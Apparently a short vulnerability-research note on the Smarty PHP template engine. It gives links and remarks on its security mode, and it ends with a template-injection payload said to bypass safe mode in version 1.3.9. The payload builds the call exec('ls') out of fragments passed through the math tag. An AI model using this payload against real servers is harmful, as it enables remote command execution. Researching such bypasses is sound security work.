141 - VID_LANGUAGE_PHP_FRAMEWORK_SMARTY
Links
• https://www.smarty.net/
• https://github.com/smarty-php/smarty
Config
Smarty should be secure if the ->enableSecurity setting is set. I've tried a few exploits, but none were confirmed. It doesn't help that the latest repo does not work out of the box on Ubuntu.smarty-3.1.30/libs/sysplugins/smarty_internal_compile_shared_inheritance.php
Found exploit for safe mode in 1.3.9
$name = '{{$a="\'exp\'"}}{{$b="\'cos\'"}}{{$c="\'log\'"}}{{math equation="({$a}[0].{$a}[1].{$a}[0].{$b}[0])(({$c}[0].{$b}[2]))"}}';